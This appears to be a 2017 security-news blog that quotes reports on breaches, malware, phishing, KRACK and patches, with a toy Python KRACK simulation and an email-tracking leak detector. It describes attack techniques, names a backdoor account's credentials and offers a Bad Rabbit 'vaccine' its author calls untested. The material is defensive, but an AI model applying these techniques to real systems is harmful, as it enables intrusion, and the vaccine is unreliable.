The government also wants all its citizens to link their Aadhaar IDs to their bank accounts, mobile numbers, insurance policies, PAN (Permanent Account Number) and other services.

Aadhaar is currently the world's largest biometric database and has already collected the iris scans and fingerprints of more than a billion Indians. Many security experts have voiced serious security and privacy concerns over the system, especially because it holds sensitive and confidential details on over a billion people.


For More:
http://www.ibtimes.co.uk/aadhaar-data-leak-more-200-indian-government-websites-expose-citizens-key-personal-details-1647982

Friday, November 17, 2017

Android WhatsApp users should be aware that when we DELETE a message, it stays (sounds strange?)

WhatsApp messages that are deleted are actually still on the device and can be easily accessed.


This is according to a report from the Spanish Android blog Android Jefe, which found that deleted WhatsApp messages – at least, the first 100 characters – can be read off of the notification log of the device.

    What we found is that the messages are stored in the notification register of the Android system. So, it’s just a matter of entering that record to see the messages that the other person deleted.

Notification History is a hidden feature that was first added in Android 4.3. Hidden it may be, but there are apps on Google Play that will happily reveal it for you.


For More:
https://nakedsecurity.sophos.com/2017/11/16/deleted-whatsapp-sent-messages-might-not-be-gone-forever/

Terdot trojan: once infected you may end up with teardrop(s)



It can target social media networks including Facebook, Twitter, Google Plus and YouTube, and email service providers including Google's Gmail, Microsoft's live.com and Yahoo Mail.

It also defeats the protection TLS (Transport Layer Security) would normally give: it generates its own Certificate Authority (CA), installs it as trusted on the victim's machine, and mints a certificate for every domain the victim visits, so its man-in-the-middle proxy can read and alter HTTPS traffic without any browser warning. A quick check on a suspect machine is to look for unexpected root certificates in the trust store.


For More:
https://thehackernews.com/2017/11/facebook-twitter-hack.html

Wednesday, November 15, 2017

The cost to change one line of code on a piece of avionics equipment is $1 million, and it takes a year to implement.



The cost to change one line of code on a piece of avionics equipment is $1 million, and it takes a year to implement. For Southwest Airlines, whose fleet is based on Boeing's 737, it would "bankrupt" them if a cyber vulnerability was specific to systems on board 737s, he said, adding that other airlines that fly 737s would also see their earnings hurt. Hickey said newer models of 737s and other aircraft, like Boeing's 787 and the Airbus Group A350, have been designed with security in mind, but that legacy aircraft, which make up more than 90% of the commercial planes in the sky, don't have these protections.


For More:
http://www.aviationtoday.com/2017/11/08/boeing-757-testing-shows-airplanes-vulnerable-hacking-dhs-says/

Monday, November 13, 2017

Watch out for this banking malware: IcedID



"The malware listens for the target URL from the list (of financial institutions) and, once it encounters a trigger, executes a designated webinjection. The webinjection sends the victim to a fake bank site set up in advance to match the one originally requested," researchers wrote.

It performs a clever trick:
to thwart detection by the end user, the malware redirects traffic while keeping the bank's correct URL in the address bar. Because a live connection to the real bank is kept open, the bank's genuine SSL certificate is also what the browser shows, so neither the URL nor the padlock gives the fraud away; it is the browser itself, not the network, that has been compromised.

For More
https://threatpost.com/new-icedid-trojan-targets-us-banks/128851/

Friday, November 10, 2017

GMAIL users - Pay attention!!


Google's study finds that victims of phishing are 400 times more likely to have their account hijacked than a random Google user

Gmail users also represent the largest group of phishing victims, accounting for 27 percent of the total in the study


For More:

https://blog.knowbe4.com/google-our-hunt-for-hackers-reveals-phishing-is-far-deadlier-than-data-breaches

Thursday, November 9, 2017

New twist in the Kaspersky story - WikiLeaks Says CIA Impersonated Kaspersky Lab



According to WikiLeaks, its analysis revealed that by using these fake certificates, the CIA made it look like data was being exfiltrated by one of the impersonated entities – in this case Kaspersky Lab.

“We have investigated the claims made in the Vault 8 report published on November 9 and can confirm the certificates in our name are fake,” Kaspersky Lab told SecurityWeek. “Our private keys, services and customers are all safe and unaffected.”

The news that the CIA may have impersonated Kaspersky Lab in its operations has led some to believe that the U.S. may have actually used such tools to falsely pin cyberattacks on Russia.

For More:
http://www.securityweek.com/wikileaks-says-cia-impersonated-kaspersky-lab

Important: Microsoft Security Advisory 4053440 for all MS Office users




Scenario
Dynamic Data Exchange (DDE) is a legacy inter-process messaging protocol, and Office documents can contain fields that ask Office to start another program through it. In an email attack scenario, an attacker could leverage the DDE protocol by sending a specially crafted file to the user and then convincing the user to open the file and accept the prompts Office shows.

Mitigating DDE attack scenarios
Users who wish to take immediate action can protect themselves by manually creating and setting registry entries that stop Office from updating DDE links automatically. The advisory lists the keys to set for each Office application and version installed on your system.


For More:
https://technet.microsoft.com/library/security/4053440

Hackers Hacking Hackers - When you use someone else's code, you should know that it could be a trojan.


Vulnerability Scanning script found with Backdoor
Remember, Nothing is free in this world.




  1. First, it scans a set of IP addresses to find GoAhead servers vulnerable to a previously disclosed Authentication bypass vulnerability (CVE-2017-8225) in Wireless IP Camera (P2P) WIFI CAM devices.
  2. In the background, it secretly creates a backdoor user account (username: VM | password: Meme123) on the wannabe hacker's system, giving the attacker the same privileges as root.
  3. Script also extracts the IP address of the wannabe hacker, allowing script author to access the compromised systems remotely.
  4. Moreover, it also runs another payload on the script kiddie’s system, eventually installing a well-known botnet, dubbed Kaiten.


For More
https://thehackernews.com/2017/11/iot-vulnerability-scanner.html

Wednesday, November 8, 2017

Did you know that Equifax might have your salary info and be selling it for $20



Every payroll period, Facebook, Amazon, Microsoft, and Oracle also provide an electronic feed of their employees’ hourly work and wage information to Equifax. So do Wal-Mart, Twitter, AT&T, Harvard Law School, and the Commonwealth of Pennsylvania. Even Edward Snowden’s former employer, the sometimes secretive N.S.A. contractor Booz Allen Hamilton, sends salary and other personal data about its employees to Equifax Workplace Solutions.

If his new prospective employer is among the 70,000 approved entities in Equifax’s verifier network with a “permissible purpose,” that company can purchase his employment and income information for about $20.

That individual has no control over who picks up the phone, whether the right information is actually given out, or if his or her privacy will be respected.

In May 2017, Equifax informed some of its customers that unauthorized access to their employee tax records continued, undetected, for nearly a year, between April 17, 2016, and March 29, 2017. These Equifax security lapses occurred in another of TALX’s databases, the Tax Form Management platform, after “crooks were able to reset the 4-digit PIN given to customer employees as a password and then steal W-2 tax data after successfully answering personal questions about those employees.”

For More:
https://www.fastcompany.com/40485634/equifax-salary-data-and-the-work-number-database

Monday, November 6, 2017

Netflix users beware - This is not something that is happening only to others. I had also received this hoax email (a few days back).


According to security firm Mailguard, if recipients click the link in the email, they are directed to a fake Netflix page asking them to login and provide their personal information, including credit card details.


Mailguard offers these tips to help users detect the real source and purpose of an email:


  • Always hover your mouse over links within emails and check the domain they're pointing to. If they look suspicious or unfamiliar, don't open them
  • Cybersecurity threats take many different forms from simple spyware downloads to sophisticated ransomware attacks. Your business can be exposed to a wide variety of different vectors: through peripherals; USB devices; networks; attachments; etc. Security best practice recommends a layered defence strategy to protect users against web threats and malware
  • 9 out of 10 cyber-attacks are delivered via email, so it's essential to have the best email filtering in place to protect your systems
  • Keep up to date on the latest scams.


For More:
https://finance.yahoo.com/news/hackers-launch-identity-theft-attack-151546094.html

Thursday, November 2, 2017

What is SOAR? - Security Orchestration, Automation and Response



Another buzzword to sell new products, but will they really do anything useful?
Probably so. Here is an interesting essay from Bruce on "orchestration" and "incident response" that helps to understand it better.

Data does not equal information, and information does not equal understanding




Uncertainty demands initiative, while certainty demands synchronization

When things are uncertain, you want your systems to be decentralized. When things are certain, centralization is more important. Good incident response teams know that decentralization goes hand in hand with initiative.


Automation has its place. If you think about the product categories where it has worked, they’re all areas where we have pretty strong certainty. Automation works in antivirus, firewalls, patch management and authentication systems

For More info:
https://securityintelligence.com/security-orchestration-for-an-uncertain-world/

Wednesday, November 1, 2017

Just in Time - Shopping (Holiday) Season advice from the SANS Security Awareness team.

Did you know - AV could be tricked into trusting an invalid cert



Simply copying an Authenticode signature from a legitimate file to a known malware sample (which results in an invalid signature) can cause antivirus products to stop detecting it.

"This flaw affects 34 antivirus products, to varying degrees, and malware samples taking advantage of this are also common in the wild,"


More Here
https://www.theregister.co.uk/2017/11/01/digital_cert_abuse/

Tuesday, October 31, 2017

FREE - Want to know if the website you are visiting is vulnerable? Then you should get this Chrome extension



Vulners Web Scanner lets you scan websites while you surf the internet!






Get it here
https://chrome.google.com/webstore/detail/vulners-web-scanner/dgdelbjijbkahooafjfnonijppnffhmd

Good news - Firefox (v58 - Jan 2018) will add a new feature - BLOCK canvas-browser-fingerprinting





Mozilla is testing a new feature in the upcoming version of its Firefox web browser that will grant users the ability to block canvas fingerprinting.


(Canvas fingerprinting is one of a number of browser fingerprinting techniques for tracking online users. It allows websites to identify and track visitors using the HTML5 canvas element instead of browser cookies or other similar means.)

The permission prompt that Firefox displays reads:

"Will you allow [site] to use your HTML5 canvas image data? This may be used to uniquely identify your computer."


Once you get this message, it's up to you whether you want to allow access to canvas fingerprinting or just block it. You can also check the "always remember my decision" box to remember your choice on future visits as well.

For More:
https://thehackernews.com/2017/10/canvas-browser-fingerprint-blocker.html

Monday, October 30, 2017

Bug in the Bug tracker - I mean the bug tracking software itself had a bug that kind of messed up Google.


Alex Birsan, a software developer and hobbyist bug-hunter, collected more than $15,000 in bounties for finding this bug and two other unrelated flaws in the Issue Tracker. The most critical of the three vulnerabilities allowed him to manipulate a request to the system that would elevate his privileges and provide him access to every detail about a particular vulnerability.


For More:
https://threatpost.com/flaw-in-google-bug-tracker-exposed-reports-about-unpatched-vulnerabilities/128687/

Friday, October 27, 2017

Patch...Patch...Patch is the simplest advice to protect against any malware - Patch Chrome today



Google is urging users to update their Chrome desktop browsers to avoid security issues related to a high-severity stack-based buffer overflow vulnerability. Google issued the alert Thursday and said an update for most browsers has been released.

Google is not releasing any details surrounding this stack buffer overflow vulnerability (CVE-2017-15396), stating, “access to bug details and links may be kept restricted until a majority of users are updated with a fix.”

For More:
https://threatpost.com/google-patches-high-severity-browser-bug/128661/

Android Phone users watch out for DoubleLocker - As you guessed, it locks your Android phone (after encrypting it) and demands ransom




The ransomware has been named DoubleLocker because it performs a two-way action to lock the phone, that is, it encrypts all the files and changes the PIN as well so that victims run out of options and give in to the ransom demands of hackers. The ransomware is being distributed as a fake update of Adobe Flash while compromised websites are being used to spread it.

The fake Adobe Flash app requests Google Play Services activation because it needs to exploit the phone’s accessibility services.

It then starts exploiting the permissions by retrieving window content, enabling advanced web accessibility for the installation of scripts, and monitoring the text that the victim types. When the permissions are granted, the ransomware is installed as the default Home app. This means that the next time the user visits the Home screen, the ransom note will be there.

For more info:
https://www.hackread.com/new-android-ransomware-permanently-changes-pin-demand-ransom/

Tuesday, October 24, 2017

Is this a temp solution for "Bad Rabbit" Ransomware?



Performing the following steps seems to work like a vaccine; some brave person tested it with a ransomware sample.

(Don't know if it really works)

===========================
Create the following files:
%windir%\infpub.dat
%windir%\cscc.dat
%windir%\dispci.exe

- remove ALL PERMISSIONS (inheritance)
===========================

Monday, October 23, 2017

Have you heard of Windows Defender Exploit Guard (Windows 10 IPS functions)



The four components of Windows Defender Exploit Guard are:

Attack Surface Reduction (ASR): A set of controls that enterprises can enable to prevent malware from getting on the machine by blocking Office-, script-, and email-based threats

Network protection: Protects the endpoint against web-based threats by blocking any outbound process on the device to untrusted hosts/IP through Windows Defender SmartScreen

Controlled folder access: Protects sensitive data from ransomware by blocking untrusted processes from accessing your protected folders

Exploit protection: A set of exploit mitigations (replacing EMET) that can be easily configured to protect your system and applications

More details here:
https://blogs.technet.microsoft.com/mmpc/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware/

Did you know that Windows 10 has a feature that could protect your system from ransomware



Microsoft has now introduced Controlled Folder Access feature in its Windows Defender Security Center that is available for Windows 10 Fall Creators Update (v1709)

By enabling Controlled Folder Access (CFA) on a folder, it becomes possible to continuously monitor changes in the system in real time and promptly identify any unauthorized access. If an unauthorized process attempts to access a folder that has been protected with CFA, it will immediately be blocked, and the user will be notified.


Follow this How-To Document:
https://www.hackread.com/microsoft-windows-10-anti-ransomware/

Friday, October 20, 2017

Mac Owners - If you installed Elmedia Player or the download manager Folx, then you should read this



Eltima Software confessed today that the latest versions of those two apps came with an unwelcome extra: the rather horrid OSX.Proton malware.

Proton is a remote-control trojan designed specifically for Mac systems. It opens a backdoor granting root-level command-line access to commandeer the computer, and can steal passwords, encryption and VPN keys, and crypto-currencies from infected systems. Its creator also claims that it'll give full access to iCloud, even if two-factor authentication is used and was put on sale in March for $50,000


For More:
https://www.theregister.co.uk/2017/10/20/a_total_system_os_reinstall_is_the_only_guaranteed_way_to_totally_rid_your_system_of_this_malware_this_is_a_standard_procedure_for_any_system_compromise_with_the_affection_of_administrator_account/

Thursday, October 19, 2017

Do you know - Chrome is getting built-in basic antivirus protection for your Windows computer.



ESET scanning engine now built in

"Our engine scans for and cleans potentially harmful applications, specifically the types that negatively impact or target the Chrome browsing experience," said Juraj Malcho, chief technology officer at ESET.

For what it's worth, Chrome, by default, automatically tries to stop software nasties from being accidentally downloaded onto a machine, by checking website URLs against lists of known dangerous and unsafe sites. If you surf to a website known for distributing malware, er, unwanted software, a big red warning will appear in the browser urging you to stop and go back the way you came.

For More Info:
https://www.theregister.co.uk/2017/10/16/chrome_for_windows_malware/

IoT Security - Not many are concerned. For those who are, here is a good essay from Mr. Bruce Schneier



Our biggest IoT security risks will stem not from devices we have a market relationship with, but from everyone else's cars, cameras, routers, drones

Basically, sellers don't compete on safety features because buyers can't efficiently differentiate products based on safety considerations

More here:
https://www.schneier.com/blog/archives/2017/10/iot_cybersecuri.html

Wednesday, October 18, 2017

BoundHook, GhostHook - These are not fishing terms, these are exploits




BoundHook exploits a feature in all Intel chips to cause an exception in a specific memory location in a user-mode context. Next, it is able to catch the exception and gain control over the thread execution used by a specific application. For example, the technique could allow for the interception of a keyboard event message passed between Windows and a specific service, allowing an attacker to capture or manipulate a victim’s keystrokes.

GhostHook - Attack method bypassed Microsoft’s attempts to prevent kernel level attacks (via PatchGuard) and used the hooking approach to take control of a device at the kernel level.

Strange but True:
Microsoft and Intel don’t see either as a vulnerability on their end. Both told CyberArk they will not patch the issue because the attack requires that the adversary has already fully compromised the targeted system.


More Here:
https://threatpost.com/boundhook-attack-exploits-intel-skylake-mpx-feature/128517/

Interested in Penetration Testing (I mean computer related pen testing)? - Try this site as your starting point


This site has a bunch of:

  • Cheat sheets
  • Walkthroughs
  • Pen test tool related info


Excellent for beginners

https://highon.coffee/


Monday, October 16, 2017

I thought one cannot calculate a private key from a public key. I was wrong



In a nutshell, the bug (in Infineon Technology chipset) makes it possible for an attacker to calculate a private key just by having a target’s public key.


The Infineon flaw is tied to a faulty design of Infineon’s Trusted Platform Module (TPM), a dedicated microcontroller designed to secure hardware by integrating cryptographic keys into devices and used for secured crypto processes.

The currently confirmed number of vulnerable keys found is about 760,000, but possibly two to three orders of magnitude more are vulnerable.


For More:
https://threatpost.com/factorization-flaw-in-tpm-chips-makes-attacks-on-rsa-private-keys-feasible/128474/

KRACK ATTACK - Welcome to Monday morning mania




The idea behind a key reinstallation attack can be summarized as follows. When a client joins a network, it executes the 4-way handshake to negotiate a fresh encryption key. It will install this key after receiving message 3 of the 4-way handshake. Once the key is installed, it will be used to encrypt normal data frames using an encryption protocol. However, because messages may be lost or dropped, the Access Point (AP) will retransmit message 3 if it did not receive an appropriate response as acknowledgment. As a result, the client may receive message 3 multiple times. Each time it receives this message, it will reinstall the same encryption key, and thereby reset the incremental transmit packet number (nonce) and receive replay counter used by the encryption protocol.

We show that an attacker can force these nonce resets by collecting and replaying retransmissions of message 3 of the 4-way handshake. By forcing nonce reuse in this manner, the encryption protocol can be attacked, e.g., packets can be replayed, decrypted, and/or forged. The same technique can also be used to attack the group key, PeerKey, TDLS, and fast BSS transition handshake.

If the victim uses either the WPA-TKIP or GCMP encryption protocol, instead of AES-CCMP, the impact is especially catastrophic. Against these encryption protocols, nonce reuse enables an adversary to not only decrypt, but also to forge and inject packets. Moreover, because GCMP uses the same authentication key in both communication directions, and this key can be recovered if nonces are reused, it is especially affected. Note that support for GCMP is currently being rolled out under the name Wireless Gigabit (WiGig), and is expected to be adopted at a high rate over the next few years
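The message 3 replay and nonce reset described above, modelled as an added example (not code from krackattacks.com or the KRACK paper): a toy supplicant that reinstalls the key and resets its counters on every message 3, beside a patched one that refuses to reinstall an already-installed key. The cipher is a constructed HMAC-based stand-in, not real CCMP, and the packet numbers and frames are made up.

```python
import hashlib
import hmac


def keystream(ptk: bytes, nonce: int, length: int) -> bytes:
    """Constructed stand-in for a nonce-based cipher (not real CCMP/GCMP):
    the keystream depends only on the installed key and the packet number."""
    return hmac.new(ptk, nonce.to_bytes(8, "big"), hashlib.sha256).digest()[:length]


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


class Client:
    """Toy WPA2 supplicant state: key, transmit packet number, receive replay counter."""

    def __init__(self, patched: bool):
        self.patched = patched
        self.ptk = None
        self.tx_nonce = 0      # incremental transmit packet number (nonce)
        self.rx_replay = 0     # highest packet number accepted so far
        self.sent = []         # (nonce, ciphertext) pairs an eavesdropper could capture

    def receive_msg3(self, ptk: bytes) -> str:
        """Message 3 of the 4-way handshake: install the PTK and answer with message 4."""
        if self.patched and self.ptk == ptk:
            # Fix: the key is already installed, so neither reinstall it nor
            # reset the nonce or replay counter; only re-send message 4.
            return "msg4"
        self.ptk = ptk
        self.tx_nonce = 0      # vulnerable behaviour: counters reset on every install
        self.rx_replay = 0
        return "msg4"

    def send(self, plaintext: bytes):
        self.tx_nonce += 1
        ct = xor_bytes(plaintext, keystream(self.ptk, self.tx_nonce, len(plaintext)))
        self.sent.append((self.tx_nonce, ct))
        return self.tx_nonce, ct

    def receive(self, nonce: int, ct: bytes):
        """Accept a frame only if its packet number is above the replay counter."""
        if nonce <= self.rx_replay:
            return None        # replayed frame dropped
        self.rx_replay = nonce
        return xor_bytes(ct, keystream(self.ptk, nonce, len(ct)))


def nonce_reuse(frames):
    """Monitoring view: from captured (nonce, ciphertext) pairs, report every
    packet number that was used more than once under the same key."""
    seen = {}
    for nonce, ct in frames:
        seen.setdefault(nonce, []).append(ct)
    return {n: cts for n, cts in seen.items() if len(cts) > 1}


def simulate(patched: bool) -> dict:
    """Deliver message 3 twice (the second time as a replay) and record what
    happens to the client's nonces and replay protection."""
    ptk = hashlib.sha256(b"constructed PMK|ANonce|SNonce").digest()   # made-up key material
    client = Client(patched)

    client.receive_msg3(ptk)                     # legitimate message 3
    client.send(b"GET /account HTTP/1.1")        # client frame, nonce 1
    ap_frame = (1, xor_bytes(b"HTTP/1.1 200 OK", keystream(ptk, 1, 15)))
    first = client.receive(*ap_frame)            # AP frame with packet number 1, accepted

    client.receive_msg3(ptk)                     # replayed message 3
    client.send(b"POST /login pw=hunter2")       # unpatched client: nonce 1 reused
    replayed = client.receive(*ap_frame)         # unpatched client: old frame accepted again

    return {
        "nonce_reuse": nonce_reuse(client.sent),
        "replay_accepted": replayed is not None,
        "first_ok": first == b"HTTP/1.1 200 OK",
    }


if __name__ == "__main__":
    for label in (False, True):
        r = simulate(label)
        print("patched" if label else "unpatched", r["nonce_reuse"].keys(), r["replay_accepted"])
```

With the unpatched client, the two ciphertexts under nonce 1 XOR to the XOR of their plaintexts, which is the decryption the text refers to; the patched client shows no reused nonce and drops the replayed frame.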


For more info:
https://www.krackattacks.com/

Friday, October 13, 2017

To Trust or NOT to Trust is the dilemma



The Facebook scam abuses “Trusted Contacts,” a Facebook account recovery feature that sends access codes to a selected list of a user’s trusted friends in order to help them regain access to their Facebook account in case they forget their password or lose access to their account.


For More
http://securityaffairs.co/wordpress/64276/cyber-crime/facebook-scam-trusted-contacts.html?

Thursday, October 12, 2017

Did you know GDPR applies to the entire world, not just Europe



GDPR, which goes into effect on 25 May 2018, states that any organization that handles the personally identifiable information of any living EU resident must protect that information. If that information is breached, that organization must report the incident and notify those individuals.



Excellent SANS Doc:
https://www.sans.org/reading-room/whitepapers/analyst/preparing-compliance-general-data-protection-regulation-gdpr-technology-guide-security-practitioners-37667#


For More Info:
https://securingthehuman.sans.org/blog/2017/10/10/hey-america-and-world-gdpr-applies-to-you-to

If you are a Netflix subscriber, you may want to read this



It begins with a mail purporting to be from the streaming giant, asking for an account update. Once the victim enters their Netflix credentials on a spoofed website, they are redirected to a second screen, which harvests the victim’s credit card details. The final step shows a thank-you message, where clicking the “Get Started” button takes the visitor to Netflix.com, meaning that they could remain blissfully unaware that they’ve been phished for quite some time.

PhishMe’s analysis found that the email address associated with the campaign has been involved in the use of five different phishing toolkits since June, targeting customers of Chase Bank, Comcast, Netflix, TD Bank and Wells Fargo. But business users can be at risk as well


More Here:
https://www.infosecurity-magazine.com/news/netflix-phish-corporate-dangers?utm_source=twitterfeed&utm_medium=twitter

New Service from Equifax - Free Flash update Offer (Thanks to Hackers)




Equifax website was compromised (again) to deliver Fraudulent Adobe Flash updates.

As if the data breach was not enough, now they have a website compromise.



For several hours on Wednesday, and again early Thursday morning, the site was maliciously manipulated again, this time to deliver fraudulent Adobe Flash updates, which when clicked, infected visitors' computers with adware that was detected by only three of 65 antivirus providers

More Here:
https://arstechnica.com/information-technology/2017/10/equifax-website-hacked-again-this-time-to-redirect-to-fake-flash-update/


Wednesday, October 11, 2017

What could happen when you misconfigure Amazon S3 buckets? - Data Breach - 150K PHI records exposed


A new development in "data exfiltration" is increased data staging within cloud infrastructures prior to exfiltration.

“Imagine a commercial mover putting your furniture into a moving van,” Mayfield explained. “No shock here, that seems like normal asset movement. But then, an accomplice walks up to the fully loaded van, key in the ignition, and drives away. This is not a perfect analogy, but it gets very close to the data staging and exfiltration that happens with cloud infrastructure.”


For More:
https://www.infosecurity-magazine.com/news/med-records-for-150k-americans

Very Interesting conversation/debate on PASSWORDS - Highly recommended

Bank Heist - Reminds me of the song Smooth Criminal(s)



The interesting part is that this targeted attack includes good coordination at the physical and technical levels.

Hussey says his company investigated heists at five different banks in post-Soviet countries. Attackers made off with sums between $3 million and $10 million per bank, for a total of over $40 million



For More:
https://www.bleepingcomputer.com/news/security/bank-cyber-thieves-get-clever-with-new-overdraft-technique/

Microsoft Patch Tuesday - CVE-2017-11826 - patch it ASAP



Microsoft's October Patch Tuesday release covered a wide spectrum of problems with the majority possibly resulting in remote code execution (RCE) and CVE-2017-11826 being publicly disclosed and actively exploited

The early take from cyber industry insiders is CVE-2017-11826, found in Microsoft Office, needs to be immediately addressed

“Top priority for patching should go to a vulnerability in Microsoft Office, CVE-2017-11826, which Microsoft has ranked as ‘Important’ and is actively being exploited in the wild,” said Jimmy Graham, director of product management at Qualys.


More Here:
https://www.scmagazine.com/patch-tuesday-microsoft-62-vulnerabilities-28-critical-one-spotted-in-the-wild/article/699296/

Tuesday, October 10, 2017

Did you know - Browsers are intermediaries in an online transaction



By moving the storage of payment card details into the browser, the responsibility of keeping these details safe is moved to the browser and the user.

The Payment Request API also demands that users take greater responsibility for their data security. 

For More:
https://www.grahamcluley.com/browser-credit-cards/

Beware - New Phishing Attack

Cybercriminals are using a new phishing campaign that impersonates "secure messages" from private financial institutions such as Bank of America and TD Commercial banking to deliver malware to unsuspecting victims


More Here
http://www.ibtimes.co.uk/new-phishing-emails-claiming-be-secure-message-private-banks-secretly-deliver-malware-1641269?utm_content=61324933&utm_medium=social&utm_source=twitter

Thursday, October 5, 2017

5 Tenets of Cyber Security




Sweet and Simple (but rarely followed)

Your organization does not exist to be secure, it exists to get things done.

Amateurs mitigate risk, professionals manage risk. If you are confused by the difference, you need to read some of Bruce Schneier's books. There are three ways to manage risk: you mitigate it, you accept it or you transfer it

Risk is the likelihood of an incident times the harm of that incident. Likelihood is made up of Threats and Vulnerabilities

Our job is to support the organization's mission. That means when dealing with a cyber security challenge, you may not be the one to make a decision


Managing risk is based on three core areas: Technology, Process and People.
We have hit the point of diminishing returns with Technology but continue to fail in the Process and People side.

For More:
https://securingthehuman.sans.org/blog/2017/10/05/the-five-tenets-of-cyber-security/

The nature of cyberattacks is changing in ways that we did not expect


Such as:

  • Use of social media to attempt to influence votes or drive division within a nation via Twitter and targeted Facebook advertising campaigns.

  • The Sony hack by North Korea, a pivotal moment when it came to nation states attempting to attack U.S. interests in unconventional ways.

Another social-fueled criminal trend is the rise of "dark markets", which facilitate all manner of crime, from narcotics trafficking to illegal firearm sales, identity theft, child exploitation, and computer hacking.

More here:
https://threatpost.com/attackers-redefining-objectives-approaches/128276/

Tuesday, October 3, 2017

October is National Cybersecurity Awareness Month - Need Ideas? - Here is a good resource for Office, Home and even Kids

Ever wondered how Email Tracking works?




Here is a nice article:


Almost all web browsers, in the case of webmail, send third-party cookies with these requests. The email address is leaked by being encoded as a parameter into these third-party URLs.

About 29% of emails leak the user’s email address to at least one third party when the email is opened, and about 19% of senders sent at least one email that had such a leak.
The majority of these leaks (62%) are intentional.[4] If the leaked email address is associated with a tracking cookie.

Most of the top leak recipients, including LiveIntent, Acxiom, Conversant Media, and Neustar, are involved in “people-based” marketing
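A defender-side check for the leak described above, as an added example that is not the paper's code: it parses the remote resources an HTML message loads and reports third-party URLs carrying the recipient address in plain, percent-encoded, base64 or hashed form. The sample message, tracker hostnames and sender domain are constructed.

```python
import base64
import hashlib
import urllib.parse
from html.parser import HTMLParser


def address_encodings(email: str) -> dict:
    """Forms in which trackers commonly embed a recipient address in a URL:
    plain, percent-encoded, base64, and hex digests of the lowercased address."""
    raw = email.strip().lower().encode()
    return {
        "plain": raw.decode(),
        "urlencoded": urllib.parse.quote(raw.decode(), safe=""),
        "base64": base64.b64encode(raw).decode().rstrip("="),
        "md5": hashlib.md5(raw).hexdigest(),
        "sha1": hashlib.sha1(raw).hexdigest(),
        "sha256": hashlib.sha256(raw).hexdigest(),
    }


class RemoteResourceParser(HTMLParser):
    """Collect the URLs a mail client fetches when it renders the message
    (remote images and stylesheets); each fetch carries third-party cookies."""

    def __init__(self):
        super().__init__()
        self.urls = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "img" and a.get("src"):
            self.urls.append(a["src"])
        elif tag == "link" and a.get("href"):
            self.urls.append(a["href"])


def find_address_leaks(html_body: str, recipient: str, sender_domain: str):
    """Return (host, encoding) for every third-party resource URL that
    carries the recipient's address in one of the forms above."""
    parser = RemoteResourceParser()
    parser.feed(html_body)
    needles = address_encodings(recipient)
    leaks = []
    for url in parser.urls:
        host = urllib.parse.urlsplit(url).hostname or ""
        if host == sender_domain or host.endswith("." + sender_domain):
            continue  # first-party resource: the sender already knows the address
        candidates = (url, urllib.parse.unquote(url))
        for name, needle in needles.items():
            if any(needle in c for c in candidates):
                leaks.append((host, name))
                break
    return leaks


# Constructed sample message: one first-party logo, two tracking pixels that
# leak the address (percent-encoded and MD5-hashed) and one that does not.
SAMPLE_RECIPIENT = "alice@example.net"
_MD5 = hashlib.md5(SAMPLE_RECIPIENT.encode()).hexdigest()
SAMPLE_HTML = f"""<html><body>
<p>Your weekly newsletter</p>
<img src="https://cdn.newsletter-sender.example/logo.png" alt="logo">
<img src="https://tracker-one.example/open.gif?u=alice%40example.net&c=42" width="1" height="1">
<img src="https://tracker-two.example/px?e={_MD5}" width="1" height="1">
<img src="https://tracker-three.example/p.gif?id=abc123" width="1" height="1">
</body></html>"""

if __name__ == "__main__":
    for host, how in find_address_leaks(SAMPLE_HTML, SAMPLE_RECIPIENT, "newsletter-sender.example"):
        print(f"{host}: recipient address leaked ({how})")
```

The percent-encoded pixel is reported as "plain" because the URL is also checked after unquoting; a hashed address is only caught when the tracker hashes the same normalized (lowercased) form.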

For More Info:
https://freedom-to-tinker.com/2017/09/28/i-never-signed-up-for-this-privacy-implications-of-email-tracking/

Android keyboard app - Is it a keyboard or a keylogger?



First, it collected a user's Google email account as well as other important device information and uploaded all that data to its servers.

Second, it can download and execute code from a remote server in violation of its policy. Those snippets of code include plugins marked as adware or potentially unwanted programs (PUPs) by multiple anti-virus engines.

For More:
https://www.grahamcluley.com/go-keyboard-app-data-collection/

Monday, October 2, 2017

5 simple ways to improve your online safety in 5 minutes or less



We all know this but, let's be honest, how many of us follow it?



1. Use strong, unique passwords for every site requiring login

2. Keep your operating system up-to-date

3. Only connect to Wi-Fi networks you know and trust

4. Turn off Wi-Fi, Bluetooth, camera, and location services

5. Don’t download from questionable sources

For More Info:
https://www.getcybersafe.gc.ca/cnt/blg/pst-20170929-en.aspx

Free Azure Interactive Posters

Top 10 phishing email subject lines that launch ransomware (according to KnowBe4)





  1. Security Alert – 21% 
  2. Revised Vacation & Sick Time Policy – 14%
  3. UPS Label Delivery 1ZBE312TNY00015011 – 10%
  4. BREAKING: United Airlines Passenger Dies from Brain Hemorrhage – VIDEO – 10%
  5. A Delivery Attempt was made – 10%
  6. All Employees: Update your Healthcare Info – 9%
  7. Change of Password Required Immediately – 8%
  8. Password Check Required Immediately – 7%
  9. Unusual sign-in activity – 6%
  10. Urgent Action Required – 6%



For More:
https://www.csoonline.com/article/3209086/hacking/top-10-phishing-email-subject-lines-that-launch-ransomware.html?utm_content=61042854&utm_medium=social&utm_source=twitter

Friday, September 29, 2017

You already know about the Deloitte breach, but did you know this?


According to a source close to the investigation, the breach dates back to at least the fall of 2016, and involves the compromise of all administrator accounts at the company as well as Deloitte’s entire internal email system.

Information shared by a person with direct knowledge of the incident said the company in fact does not yet know precisely when the intrusion occurred, or for how long the hackers were inside of its systems.

It appears that Deloitte has known something was not right for some time. According to this source, the company sent out a “mandatory password reset” email on Oct. 13, 2016 to all Deloitte employees in the United States

“They (hackers) accessed the entire email database and all admin accounts. But we never notified our advisory clients or our cyber intel clients.”

“Cyber intel” refers to Deloitte’s Cyber Intelligence Centre, which provides 24/7 “business-focused operational security” to a number of big companies, including CSAA Insurance, FedEx, Invesco, and St. Joseph’s Healthcare System, among others.

For more info:
https://krebsonsecurity.com/2017/09/source-deloitte-breach-affected-all-company-email-admin-accounts/

Thursday, September 28, 2017

Some things you may not know about the risks associated with SSN



It’s only the last four digits that separate you from other Americans.

Using social media and other data, researchers found they could identify the first five numbers of 44% of deceased people born between 1988 and 2003 in just one attempt


When you carelessly give your Social Security number like you do your telephone number on Match.com, you are putting more than just your tax records in jeopardy. That number is also tied to your medical records, retirement accounts, and credit history

